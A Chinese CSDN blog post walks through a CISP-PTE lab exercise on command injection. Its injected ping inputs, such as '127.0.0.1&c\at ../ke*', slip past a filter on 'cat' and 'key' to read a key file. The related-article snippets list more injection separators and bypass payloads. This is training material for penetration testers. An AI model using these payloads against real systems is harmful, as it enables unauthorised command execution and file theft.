基础题目五:命令执行

最新推荐文章于 2023-12-12 00:03:57 发布
最新推荐文章于 2023-12-12 00:03:57 发布
阅读量1.1k 收藏 6
点赞数 1
分类专栏: cisp-pte
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq89115156/article/details/119258712
版权
"本文探讨了Linux环境中命令执行的安全问题,重点在于如何过滤潜在的危险字符如`&`和`cat`,以及如何利用通配符进行路径遍历尝试。作者通过实例展示了如何尝试绕过过滤机制,如使用``进行转义以及尝试使用通配符`*`。同时,提到了Linux系统的tab自动补全功能在命令行交互中的作用。"
摘要由CSDN通过智能技术生成

基础题目五:命令执行

发现过滤 cat |

&符没过滤

127.0.0.1& 能执行

127.0.0.1&cat ../key.php

发现还是不行。

那就是过滤了cat

使用\

127.0.0.1&c\at ../key.php

还是不行,过滤了key

使用通配符

127.0.0.1&c\at ../ke*

通配符

通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查找文件夹时,可以使用它来代替一个或多个真正字符;当不知道真正字符或者懒得输入完整名字时,常常使用通配符代替一个或多个真正的字符。

理解我linux 系统下的tab自动补齐

HacKing~
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令执行类型CTF题目总结
Lelouch_E的博客
11-25 1328
命令执行类型CTF题php命令执行buu Online Tool禁止套娃 php命令执行 buu Online Tool 一段php代码审计: 大致意思是获取x-forward-for头后与glzjin拼接创建文件夹,将传入参数host通过escapeshellarg和escapeshellcmd方法转义后,转到之前创建的文件夹目录,执行nmap命令。 如果两方法以上述顺序执行会有绕过漏洞 传入的参数是:172.17.0.2‘ -v -d a=1 经过escapeshellarg处理后变成了’17
基础题目命令执行
king丶
07-31 663
Linux 下的分隔符 ; | || & && 通过执行命令,发现 | 可用 并且cat被禁用无法查看key.php 使用 127.0.0.1|grep ''../key.php //这里是2个‘’ 符号。
今天我们来聊一个很基础的话题:如何执行一条命令
AIOps智能运维
03-02 901
作者简介运小宇    百度高级研发工程师负责基础运维组件相关开发工作,致力于运维基础设施的建设,夙兴夜寐,只为提高设备操作的便利性,一桥飞架南北,天堑变通途。干货概览今天我们不聊上层建筑,不聊单机房自愈,也不聊智能运维的暗夜与黎明,今天我们聊一个很基础的话题:如何执行一条命令。许多人看到这,可能觉得这是一个简单至极的问题,事实果真如此吗,别急,下面我们来抽丝剥茧,一探究竟。什么是命令首先回顾一下“
CISP-PTE练习篇(基础题目命令执行
wojiaoqwe的博客
01-30 1416
本文仅当作练习记录使用。
命令执行题目加理解
zbbjya的博客
03-21 776
听课笔记ctfshow的理解29 上图中我们会看到有一个preg_match 的函数进行正则表达式的匹配,成功返回1,否则返回0 要有分号不然出不来 phpinfo();使用时后要加分号 分号可以用?>代替 主要作用用法可以看这 https://blog.csdn.net/lituxiu/article/details/89330431?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164783517216781683952973%
Linux基础练习题(5)
Alien_Suda的博客
10-14 672
重定向知识点: 输入重定向:<覆盖,<<追加 输出重定向:>覆盖,>>追加 练习: 将/etc/passwd中的字母改为大写 将内容重定向至命令rt管道/tee/通配符知识点: 1.comm1 | comm2 将命令1的正确输出作为命令2的输入 2.tee 将输出保存在指定文件中并输出在屏幕,常和管道搭配使用 3.通配符 * 任意数量字符 [[:digit:]]一位任意数
ping探测目标主机是否存活
11-08
标题中的“ping探测目标主机是否存活”涉及到网络通信的基本概念,即使用ping命令来检查网络上的另一台设备是否可以响应。Ping是Internet控制消息协议(ICMP)的一部分,用于网络诊断。通过发送ICMP回显请求数据包到...
计算机基础题目2答案
09-13
12. **Enter**:回车键,用于执行命令或换行。 13. **双**:通常指双击鼠标左键的动作。 14. **=(等号)**:在电子表格软件中,用于开始公式输入的符号。 15. **12345**:可能是某种代码或示例数值。 16. **背景**:...
1.计算机基础知识训练200题.docx
09-09
以上是计算机基础知识训练的部分内容,涵盖了计算机历史、病毒、操作系统、信息处理、算法、CPU、计算机病毒、死循环、Linux命令、计算机应用、电子器件以及计算机辅助教学等多个方面。这些知识点构成了学习和理解...
计算机应用基础简答题目.pdf
10-14
外部命令执行优先级为COM、EXE、BAT文件。 11. Windows操作系统:其桌面是用户界面,提供丰富的资源管理和应用程序。安装Windows系统需要满足一定的硬件要求,如CPU速度和内存大小。 12. 计算机网络:是由通信设备...
硬件与基础命令及相关命令笔试1
08-08
在IT领域,特别是操作系统和服务器管理中,了解基础硬件知识和基本命令的使用至关重要。以下是对给定内容的详细解析: 1. **32位操作系统内存限制**:32位操作系统由于地址总线的限制,最大能寻址的内存通常为4GB。...
刷题——命令执行
as you know, nlp is fantasitc!
01-06 2499
命令执行 1、云演平台-ping 命令分隔符 linux系统下: %0a %0d ; & && | || windows系统下: windows中:%0a、&、|、%1a(.bat文件分隔符) index.php的内容 <?php error_reporting(0); // Get input if(isset($_GET['ip'])) { $target = $_GET['ip']; // var_dump($target); $t
指令执行过程(习题)
weixin_43638873的博客
09-05 2049
按照题目中的说法,不采用Cache也不用指令预取,那么当运行到这条指令时,指令尚未取出,并且只能从内存中取。 机器周期一般以内存读取一条指令字的最短时间来定义,而且是可以变长的。 计算机中的取指过程: 转移指令的指令周期: 在取指过程中,MAR(地址寄存器)相当于半路上的中转站 (***第二次对于PC的修改在无条件跳转指令中必定会发生,而在有条件跳转指令中则未必发生,因此题目要强调“无条件跳转指令”***) 取指操作是由控制器自动进行的,如果控制器...
模拟cisp-pte 第四题 命令执行
小明师傅博客
06-14 3011
输入127.0.0.1 | find / -name “key.php” 找到文件位置,php文件不可以直接读 tac /app/key.php 用tac读php文件 成功
linux中的分号&&和&,|和||说明与用法
qq_30339595的博客
01-03 427
“;”分号用法 方式:command1 ; command2 用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。 “| ”管道符用法 上一条命令的输出,作为下一条命令参数 方式:command1 | command2 Linux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的...
命令执行RCE及其绕过详细总结(各情景下的绕过)
最新发布
2301_76690905的博客
12-12 5453
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
CTF练习:HTTP服务之命令执行
qq_43233085的博客
12-05 493
CTF练习:HTTP服务之命令执行环境准备信息收集漏洞利用 靶机地址: 链接: https://pan.baidu.com/s/1axC2PaXqscbZKNpTq3dTkg 提取码: t8uz 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.91.88 ifconfig 查看靶机的IP,为172.19.91.8...
安鸾渗透实战平台-命令执行系列
AAAAAAAAAAAA66的博客
01-27 1575
简单的回顾一下今天刷的命令执行题目 PHP代码练习 直接给一个编辑器可以命令执行,那么直接用php的命令执行函数system, <?php system('ls /');?> cat命令打开 webshell&中国菜刀 题目提示在数据库里 直接用蚁剑连接 进去之后发现一个 配置文件 <?php $servername = "mysql"; $username = "root"; $password = "root"; // 创建连接 $..
ctfshow-web入门——命令执行(1)(web29-web40)
m0_62905745的博客
03-16 913
本篇文章是ctfshow的web入门部分的命令执行部分wp(web29-web 40),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
UNIX操作系统基础命令与通信工具
`:用于连接多个命令,确保所有命令依次执行。 - `>` 和 `>>`:分别是重定向输出和追加重定向输出的符号,`>`会覆盖目标文件,`>>`会在原有内容基础上添加。 - `*` 和 `?`:通配符,`*`代表任意数量的字符,`?`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值